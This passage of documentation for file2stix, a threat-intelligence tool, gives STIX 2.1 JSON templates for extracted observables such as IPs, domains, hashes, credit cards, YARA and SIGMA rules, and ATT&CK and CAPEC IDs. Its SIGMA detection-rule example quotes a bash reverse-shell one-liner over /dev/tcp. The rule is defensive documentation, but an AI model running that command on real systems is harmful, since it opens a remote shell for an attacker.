"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "ipv6: <EXTRACTED IPV6 OBSERVABLE VALUE>",
"pattern_type": "stix",
"pattern": "[ ipv6-addr:value = '<EXTRACTED IPV6 OBSERVABLE VALUE WITH [] REMOVED>' AND network-traffic:dst_port = '<EXTRACTED IPV6 PORT VALUE>' ]",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
STIX 2.1 ipv6-addr and network-traffic SCO
{
"type": "ipv6-addr",
"spec_version": "2.1",
"id": "ipv4-addr--<GENERATED BY STIX2 LIBRARY>",
"value": "<EXTRACTED IPV6 OBSERVABLE VALUE>"
}
{
"type": "network-traffic",
"spec_version": "2.1",
"id": "network-traffic--<GENERATED BY STIX2 LIBRARY>",
"dst_ref": "ipv4-addr--<IPV6 OBJECT ID>",
"dst_port": "<EXTRACTED IPV6 PORT VALUE>",
"protocols": [
"ipv6"
]
}
3. Domain Name Observables (DomainNameOnly
and DomainNameSub
)
indicator
(withrelationship
toreport
)domain-name
) (withrelationship
toindicator
)
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "Domain: <EXTRACTED DOMAIN NAME OBSERVABLE VALUE>",
"pattern_type": "stix",
"pattern": "[ domain-name:value = '<EXTRACTED DOMAIN NAME OBSERVABLE VALUE>' ]",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
STIX 2.1 domain-name SCO
{
"type": "domain-name",
"spec_version": "2.1",
"id": "domain-name--<GENERATED BY STIX2 LIBRARY>",
"value": "<EXTRACTED DOMAIN NAME VALUE>"
}
4. URL Observables (URLFull
and URLPart
)
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "URL: <EXTRACTED URL OBSERVABLE VALUE>",
"pattern_type": "stix",
"pattern": "[ url:value = '<EXTRACTED URL OBSERVABLE VALUE>' ]",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
STIX 2.1 url SCO
{
"type": "url",
"spec_version": "2.1",
"id": "url--<GENERATED BY STIX2 LIBRARY>",
"value": "<EXTRACTED URL VALUE>"
}
5. File Name Observables (FileName
)
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "File name: <EXTRACTED FILE NAME OBSERVABLE VALUE>",
"pattern_type": "stix",
"pattern": "[ file:name = '<EXTRACTED FILE NAME OBSERVABLE VALUE>' ]",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
STIX 2.1 file SCO
{
"type": "file",
"spec_version": "2.1",
"id": "file--<GENERATED BY STIX2 LIBRARY>",
"name": "<EXTRACTED FILE NAME VALUE>"
}
6. Directory Path Observables (DirectoryPathWindows
and DirectoryPathUNIX
)
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "Directory: <EXTRACTED DIRECTORY OBSERVABLE VALUE>",
"pattern_type": "stix",
"pattern": "[ directory:path = '<EXTRACTED DIRECTORY OBSERVABLE VALUE>' ]",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
STIX 2.1 directory SCO
{
"type": "directory",
"spec_version": "2.1",
"id": "directory--<GENERATED BY STIX2 LIBRARY>",
"path": "<EXTRACTED DIRECTORY OBSERVABLE VALUE>"
}
5/6. Filename and filepath
If a filename and file path are detected in the same string (e.g. /path/to/file.txt
extracts /path/to/
and file.txt
) then an addition SRO is created to denote their relationship as follows;
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<SIGNALS CORPS IDENTITY ID>",
"created": "<REPORT CREATED DATE>",
"modified": "<REPORT CREATED DATE>",
"relationship_type": "file-path",
"source_ref": "file--<FILE OBJECT>",
"target_ref": "directory--<DIRECTORY OBJECT>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
7. File Hashes (indicator
)
Here is how file hashes are represented in STIX 2.1 by file2stix (note, <FILE HASH TYPE>
= either MD5, SHA-1, SHA-256, SHA-512, SHA3-256, SHA3-512, SSDEEP);
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "<FILE HASH TYPE>: <EXTRACTED FILE HASH OBSERVABLE VALUE>",
"pattern_type": "stix",
"pattern": "[ file:hashes.<FILE HASH TYPE> = '<EXTRACTED FILE HASH OBSERVABLE VALUE>' ]",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
STIX 2.1 file SCO
{
"type": "file",
"spec_version": "2.1",
"id": "file--<GENERATED BY STIX2 LIBRARY>",
"hashes": {
"<FILE HASH TYPE>": "<EXTRACTED FILE HASH OBSERVABLE VALUE>"
}
}
8. Email Address Observables (EmailAddress
)
indicator
(withrelationship
toreport
)email-addr
) (withrelationship
toindicator
)
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "Email Address: <EXTRACTED EMAIL ADDRESS OBSERVABLE VALUE>",
"pattern_type": "stix",
"pattern": "[ email-addr:value = '<EXTRACTED EMAIL ADDRESS OBSERVABLE VALUE>' ]",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
STIX 2.1 email-addr SCO
{
"type": "email-addr",
"spec_version": "2.1",
"id": "email-addr--<GENERATED BY STIX2 LIBRARY>",
"value": "<EXTRACTED EMAIL ADDRESS OBSERVABLE VALUE>"
}
9. MAC Address Observables (MacAddress
)
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "MAC Address: <EXTRACTED MAC ADDRESS OBSERVABLE VALUE>",
"pattern_type": "stix",
"pattern": "[ mac-addr:value = '<EXTRACTED MAC ADDRESS OBSERVABLE VALUE>' ]",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
STIX 2.1 mac-addr SCO
{
"type": "mac-addr",
"spec_version": "2.1",
"id": "mac-addr--<GENERATED BY STIX2 LIBRARY>",
"value": "<EXTRACTED MAC ADDRESS OBSERVABLE VALUE>"
}
10. Windows Registry Key Observables (WindowsRegistryKey
)
indicator
(withrelationship
toreport
)windows-registry-key
) (withrelationship
toindicator
)
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "Windows Registry Key: <EXTRACTED WINDOWS REGISTRY KEY OBSERVABLE VALUE>",
"pattern_type": "stix",
"pattern": "[ windows-registry-key:key = '<EXTRACTED WINDOWS REGISTRY KEY OBSERVABLE VALUE>' ]",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
STIX 2.1 windows-registry-key SCO
{
"type": "windows-registry-key",
"spec_version": "2.1",
"id": "windows-registry-key--<GENERATED BY STIX2 LIBRARY>",
"key": "<EXTRACTED WINDOWS REGISTRY KEY OBSERVABLE VALUE>"
}
11. User Agent Observables (UserAgent
)
indicator
(withrelationship
toreport
)user-agent
) (withrelationship
toindicator
)extension-definition
STIX 2.1 extension-definition
As STIX 2.1 does not natively have an extension for user agents file2stix uses a custom SCO;
https://github.com/signalscorps/stix2-objects/blob/main/extension-definition/new-sco/user-agent/
STIX 2.1 user-agent SCO
{
"type": "user-agent",
"spec_version": "2.1",
"id": "user-agent--<GENERATED BY STIX2 LIBRARY>",
"string": "<EXTRACTED FULL USER AGENT STRING>",
"extensions": {
"extension-definition--6cea4dc9-9517-44b8-b021-ae82e2f1de43" : {
"extension_type" : "new-sco"
}
}
}
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "User Agent: <EXTRACTED FULL USER AGENT STRING>",
"pattern_type": "stix",
"pattern": "[ user-agent:string = '<EXTRACTED FULL USER AGENT STRING>' ]",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
12. Autonomous System Number Observables (AutonomousSystemNumber
)
indicator
(withrelationship
toreport
)autonomous-system
) (withrelationship
toindicator
)
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "AS<EXTRACTED NUMERICAL AS OBSERVABLE VALUE>",
"pattern_type": "stix",
"pattern": "[ autonomous-system:number = '<EXTRACTED NUMERICAL AS OBSERVABLE VALUE>' ]",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
STIX 2.1 autonomous-system SCO
{
"type": "autonomous-system",
"spec_version": "2.1",
"id": "autonomous-system--<GENERATED BY STIX2 LIBRARY>",
"number": "<EXTRACTED NUMERICAL AS OBSERVABLE VALUE>"
}
13. Cryptocurrency Observables (CryptocurrencyBTC
, CryptocurrencyETH
, and CryptocurrencyXMR
)
indicator
(withrelationship
toreport
)cryptocurrency-transaction
) (withrelationship
toindicator
)extension-definition
STIX 2.1 extension-definition
As STIX 2.1 does not natively have an extension for cryptocurrency, file2stix uses a custom SCO;
https://github.com/signalscorps/stix2-objects/blob/main/extension-definition/new-sco/cryptocurrency-transaction
STIX 2.1 cryptocurrency transaction SCO
{
"type": "cryptocurrency-transaction",
"spec_version": "2.1",
"id": "cryptocurrency-transaction--<GENERATED BY STIX2 LIBRARY>",
"currency_symbol": "<DETECTED CURRENCY TYPE>",
"address": "<EXTRACTED CRYPTOCURRENCY OBSERVABLE VALUE>",
"extensions": {
"extension-definition--532ae28d-137b-4b89-afb7-9cf9b504191b" : {
"extension_type" : "new-sco"
}
}
}
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "<CRYPTO TYPE> Transaction: <EXTRACTED CRYPTOCURRENCY OBSERVABLE VALUE>",
"pattern_type": "stix",
"pattern": "[ cryptocurrency-transaction:address = '<EXTRACTED CRYPTOCURRENCY OBSERVABLE VALUE>' ]",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
14. CVE Observables (CVE
)
All STIX objects reported by cve2stix API for the CVE ID are imported to file2stix;
GET https://www.cve2stix.com/api/v1/cve/<CVE ID>
The indicator
object returned by the CVE response should have a relationship
genrated by file2stix to the report
.
15. CPE Observables (CPE
)
All STIX objects reported by cve2stix API for the CVE D are imported to file2stix;
GET https://www.cve2stix.com/api/v1/cpe/<CPE ID>
The software
object returned by the CVE response should have a relationship
genrated by file2stix to the report
.
Note, this response might also contain the same software objects as for CVEs. In which case the Software object should only be included once in the resulting bundle.
16. Country Observables (CountryName
and CountryCode
)
STIX 2.1 location SDO
{
"type": "location",
"spec_version": "2.1",
"id": "location--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"name": "Country: <EXTRACTED / CONVERTED FULL COUNTRY NAME OBSERVABLE VALUE>",
"country": "<EXTRACTED / CONVERTED COUNTRY ISO OBSERVABLE VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
Note, in the case of Country Name extractions, the country name needs to be converted to a two character ISO 3166-1 ALPHA-2 Code for the country
property.
17. Credit Card Observables (CreditCardMastercard
, CreditCardVisa
, CreditCardAmex
, CreditCardUnionPay
, CreditCardDiners
, CreditCardJCB
, CreditCardDiscover
)
indicator
(withrelationship
toreport
)credit-card
) (withrelationship
toindicator
)extension-definition
STIX 2.1 extension-definition
As STIX 2.1 does not natively have an extension for credit cards, file2stix uses a custom SCO;
https://raw.githubusercontent.com/signalscorps/stix2-objects/main/extension-definition/new-sco/credit-card)
STIX 2.1 credit-card SCO
{
"type": "credit-card",
"spec_version": "2.1",
"id": "credit-card--<GENERATED BY STIX2 LIBRARY>",
"issuer": "<CREDIT CARD TYPE>",
"number": "<CREDIT CARD NUMBER>",
"extensions": {
"extension-definition--abd6fc0e-749e-4e6c-a20c-1faa419f5ee4" : {
"extension_type" : "new-sco"
}
}
}
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "<CARD TYPE> Credit Card: <EXTRACTED CREDIT CARD OBSERVABLE VALUE>",
"pattern_type": "stix",
"pattern": "[ credit-card:number = '<EXTRACTED CREDIT CARD OBSERVABLE VALUE>' ]",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
18. Bank Account Observables (IBAN
)
indicator
(withrelationship
toreport
)credit-card
) (withrelationship
toindicator
)extension-definition
STIX 2.1 extension-definition
As STIX 2.1 does not natively have an extension for IBANs, file2stix uses a custom SCO;
https://raw.githubusercontent.com/signalscorps/stix2-objects/main/extension-definition/new-sco/bank-account/
STIX 2.1 bank-account SCO
{
"type": "bank-account",
"spec_version": "2.1",
"id": "bank-account--<GENERATED BY STIX2 LIBRARY>",
"iban_number": "<FULL IBAN NUMBER INCLUDING COUNTRY CODE>",
"extensions": {
"extension-definition--349c1029-4052-4635-a064-263cb17290ea": {
"extension_type" : "new-sco"
}
}
}
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "Bank account: <EXTRACTED IBAN OBSERVABLE VALUE>",
"pattern_type": "stix",
"pattern": "[ bank-account:iban_number = '<EXTRACTED IBAN OBSERVABLE VALUE>' ]",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
19. YARA Rule Observables (YaraRule
)
e.g.
rule dummy
{
condition:
false
}
YARA rules are can be identified using pattern matching as they always start with rule
and end with }
.
indicator
(withrelationship
toreport
)
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "YARA Rule: <RULE NAME>",
"pattern_type": "yara",
"pattern": "<YARA RULE>",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
The YARA rule is first encoded with JSON escapes before it is saved in the pattern
value. e.g.
rule dummy\r\n{\r\n condition:\r\n false\r\n}
The <RULE NAME>
is defined between the text rule
and first {
(e.g. dummy
in the last example).
20. SIGMA Rule Observables (indicator
)
e.g.
title: Linux Reverse Shell Indicator
id: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871
status: experimental
description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
date: 2021/10/16
author: Florian Roth
logsource:
product: linux
category: network_connection
detection:
selection:
Image|endswith: '/bin/bash'
filter:
DestinationIp:
- '127.0.0.1'
- '0.0.0.0'
condition: selection and not filter
SIGMA Rules are detected if valid YAML containing three top level fields title
, logsource
and detection
is present. If the three field names are detected, entire YAML content is ingested as the SIGMA rule.
indicator
(withrelationship
toreport
)extension-definition
STIX 2.1 extension-definition
https://github.com/signalscorps/stix2-objects/tree/main/extension-definition/property-extension/file2stix-sigma-rule-extension-indicator-sdo/
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "SIGMA Rule: <SIGMA RULE TITLE>",
"pattern_type": "sigma",
"pattern": "<SIGMA RULE>",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "Sigma Rule Reference",
"url": "<SIGMA RULE REFERENCES[0]>"
},
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
],
"extensions": {
"extension-definition--94f4bdb6-7f39-4d0a-b103-f787026963a6": {
"extension_type": "property-extension",
"sigma_rule": {
"title": "<SIGMA RULE TITLE>",
"id": "<SIGMA RULE ID>",
"date": "<SIGMA RULE DATE>",
"modified": "<SIGMA RULE MODIFIED>",
"related": [
{
"id": "<SIGMA RULE RELATED.ID[0]>",
"type": "<SIGMA RULE RELATED.TYPE[0]>"
}
],
"status": "<SIGMA RULE STATUS>",
"description": "<SIGMA RULE DESCRIPTION>",
"license": "<SIGMA RULE LICENSE>",
"author": "<SIGMA RULE AUTHOR>",
"references": [
"<SIGMA RULE REFERENCES[0]>"
],
"fields": [
"<SIGMA RULE FIELDS[0]>"
],
"falsepositives": [
"<SIGMA RULE FALSEPOSITIVES[0]>"
],
"level": "<SIGMA RULE LEVEL>",
"tags": [
"<SIGMA RULE TAGS[0]>"
],
"logsource": {
"category": "<SIGMA RULE LOGSOURCE.CATEGORY>",
"product": "<SIGMA RULE LOGSOURCE.PRODUCT>",
"service": "<SIGMA RULE LOGSOURCE.SERVICE>",
"definition": "<SIGMA RULE LOGSOURCE.DEFINITION>"
},
"detection": [
"<SIGMA RULE DETECTION[0]>"
]
}
}
}
}
The SIGMA RULE is encoded with JSON escapes before being written into the pattern
value. e.g.
title: Linux Reverse Shell Indicator\r\nid: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871\r\nstatus: experimental\r\ndescription: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& \/dev\/tcp\/10.0.0.1\/4242 0>&1')\r\ndate: 2021\/10\/16\r\nauthor: Florian Roth\r\nlogsource:\r\n product: linux\r\n category: network_connection\r\ndetection:\r\n selection:\r\n Image|endswith: '\/bin\/bash'\r\n filter:\r\n DestinationIp: \r\n - '127.0.0.1'\r\n - '0.0.0.0'\r\n condition: selection and not filter
The <RULE NAME>
is defined by the value in the title:
field of the YAML rule.
21. MITRE ATT&CK Observables
file2stix is designed to identify ATT&CK data found in text using keyword matches on the name
, external_references.external_id
(where "source_name": "mitre-attack"
for Enterprise ATT&CK or "source_name": "mitre-mobile-attack"
for mobile ATT&CK) and x_mitre_aliases
(when exists) fields inside the STIX object representing it.
Take the ATT&CK sub-technique 1053.005: Scheduled Task.
You will see;
"name": "Scheduled Task",
and
{
"source_name": "mitre-attack",
"external_id": "T1053.005",
"url": "https://attack.mitre.org/techniques/T1053/005"
},
Therefore, the dictionary entries to identify this ATT&CK Object are Scheduled Task
and T1053.005
(case insensitive).
The following ATT&CK data types from the Enterprise and Mobile and ICS matrices are supported in this way;
- Techniques (
attack-pattern
) - Sub-Technique (
attack-pattern
) - Tactic (
x-mitre-tactic--
) - Course of Action (
course-of-action
) - Intrusion Set (
intrusion-set
) - Malware (
malware
) - Tool (
tool
) - Data Sources (
x-mitre-data-source
)
In the case of a dictionary match to a MITRE ATT&CK STIX Object, no new object is actually created. A new Relationship Object is created between the created STIX Report SDO with imported ATT&CK STIX Object. The ATT&CK STIX Object remains unmodified.
For example, if the uploaded text contained 1053.005
it would match to the ATT&CK Object 1053.005: Scheduled Task and an SRO would be created between the Report SDO and this Attack Pattern SDO.
22. MITRE CAPEC Observables
CAPECs are extracted in a very similar way to ATT&CK objects, using a dictionary.
file2stix can identify ATT&CK data found in text using keyword matches on the name
and external_references.external_id
(where "source_name": "capec"
) fields inside the STIX object representing it.
Take CAPEC-170 Web Application Fingerprinting.
You will see;
"name": "Web Application Fingerprinting",
and
{
"external_id": "CAPEC-170",
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/170.html"
},
Therefore, the dictionary entries to identify this CAPEC Object are Web Application Fingerprinting
and CAPEC-170
(case insensitive).
The following CAPEC data types are supported in this way;
- CAPEC (
attack-pattern
)
In the case of a dictionary match to a MITRE CAPEC STIX Object, no new object is created. A new Relationship Object is created between the created STIX Report SDO with imported CAPEC STIX Object. The CAPEC STIX Object remains unmodified.
For example, if the uploaded text contained CAPEC-170 it would match to the CAPEC Object CAPEC-170 Web Application Fingerprinting and an SRO would be created between the Report SDO and this Attack Pattern SDO.
23. Custom Extractions (regex and lookups)
